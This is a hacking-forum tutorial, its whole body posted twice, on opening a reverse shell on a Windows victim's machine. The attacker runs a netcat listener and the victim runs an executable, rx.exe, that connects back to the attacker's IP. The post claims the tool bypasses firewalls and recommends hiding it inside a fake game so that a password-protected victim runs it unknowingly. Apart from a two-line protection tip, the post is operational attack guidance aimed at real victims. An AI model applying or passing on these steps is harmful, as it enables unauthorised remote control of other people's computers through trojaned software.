exploiting pc data 05-23-2011, 06:29 PM
#1
Now as some of you may have used metasploit in the past, in the payloads or exploit list ( i don't really remember ) there might a have been a windows/meterpreter/reverse shell payload ... in this tut i will cover how to exploit a pc through a reverse shell without metasploit ...
RX.EXE is the "smallest" vc++ coded universal application.
Why i said UNIVERSAL is because it runs on every kind of windows
from win 93 to xp, any kind of service pack ...
Default port from which it connects: 443
Default port to which it connects: 8080
NOTE : i really recommand you to try this hack in a vmware workstation with win xp or win 2000 installed on it .
Lets say we have 2 computers
the victim with the ip of 10.10.10.18
and the hacker with the ip of 10.10.10.36
( do not close any command promts or winsows during this tutorial , keep all cmd's you open, opened )
now on the hacker machine open netcat and execute
nc –l –n –v –p 8080
netcat will start listening your prompts
on the victim's machine ( where you will have already put rx.exe on a directory ) start rx's promt and type
rx 10.10.10.36 ( NOTE THIS IS THE HACKER'S IP ? ) and press enter
for one moment its stuck but lets go back to the hackers machine
open the netcat session that you started to listen on the hacker machine and you will see a
C:/>
could that be the victim's prompt ?
yea it is Big Grin
and you can verify it by typing ipconfig and you will see the victims IP, you succesfully reversed a shell between 2 computers and now you can play with it around a bit
Now as most of you read this they could think :
"nah metasploit already puts a reverse shell connection to me and a victim, and its eisier"
well let me tell you something, metasploit can be blocked by different kind of firewalls but rx cant Big Grin
" how do i put the rx.exe in the victim ? if i have to excecute if from his pc i need the hack to exploit data so this is ussless" :
well lets say u wanna hack a guy whic's pc is restricted to ppl, also with a strong pass but he loves to play games
you can put the rx.exe in a game that you will say you made and when he executes it the rx process will run but just remember to do it the right way ...
ways to protect ? :
-strong and updated anti-viruses
-ACL's
RX.EXE is the "smallest" vc++ coded universal application.
Why i said UNIVERSAL is because it runs on every kind of windows
from win 93 to xp, any kind of service pack ...
Default port from which it connects: 443
Default port to which it connects: 8080
NOTE : i really recommand you to try this hack in a vmware workstation with win xp or win 2000 installed on it .
Lets say we have 2 computers
the victim with the ip of 10.10.10.18
and the hacker with the ip of 10.10.10.36
( do not close any command promts or winsows during this tutorial , keep all cmd's you open, opened )
now on the hacker machine open netcat and execute
nc –l –n –v –p 8080
netcat will start listening your prompts
on the victim's machine ( where you will have already put rx.exe on a directory ) start rx's promt and type
rx 10.10.10.36 ( NOTE THIS IS THE HACKER'S IP ? ) and press enter
for one moment its stuck but lets go back to the hackers machine
open the netcat session that you started to listen on the hacker machine and you will see a
C:/>
could that be the victim's prompt ?
yea it is Big Grin
and you can verify it by typing ipconfig and you will see the victims IP, you succesfully reversed a shell between 2 computers and now you can play with it around a bit
Now as most of you read this they could think :
"nah metasploit already puts a reverse shell connection to me and a victim, and its eisier"
well let me tell you something, metasploit can be blocked by different kind of firewalls but rx cant Big Grin
" how do i put the rx.exe in the victim ? if i have to excecute if from his pc i need the hack to exploit data so this is ussless" :
well lets say u wanna hack a guy whic's pc is restricted to ppl, also with a strong pass but he loves to play games
you can put the rx.exe in a game that you will say you made and when he executes it the rx process will run but just remember to do it the right way ...
ways to protect ? :
-strong and updated anti-viruses
-ACL's

![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
![[Image: 9Kcm1.png]](http://i.imgur.com/9Kcm1.png)
